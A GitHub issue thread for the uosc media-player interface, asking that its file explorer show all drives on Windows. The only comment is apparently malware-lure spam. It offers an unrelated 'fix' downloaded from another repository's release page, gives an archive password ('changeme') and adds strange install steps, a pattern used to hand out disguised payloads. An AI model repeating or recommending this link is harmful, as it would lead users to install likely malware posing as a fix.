### ISSUE TITLE
Support displaying drives as default_directory on windows

### ISSUE THREAD

**Issue by tomasklaen** [tomasklaen/uosc#953]
### Discussed in https://github.com/tomasklaen/uosc/discussions/952

<div type='discussions-op-text'>

<sup>Originally posted by **redomCL** August 19, 2024</sup>
Could it be added a new  features in the future: The built-in file explorer can show all drives by default on Windows10/11：
![357273636-07e3c056-9eb0-49e7-891c-9c83ad8d8d7d](https://github.com/user-attachments/assets/8b0ddda0-db3c-4738-a05c-0a7e71eb32d8)
</div>

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
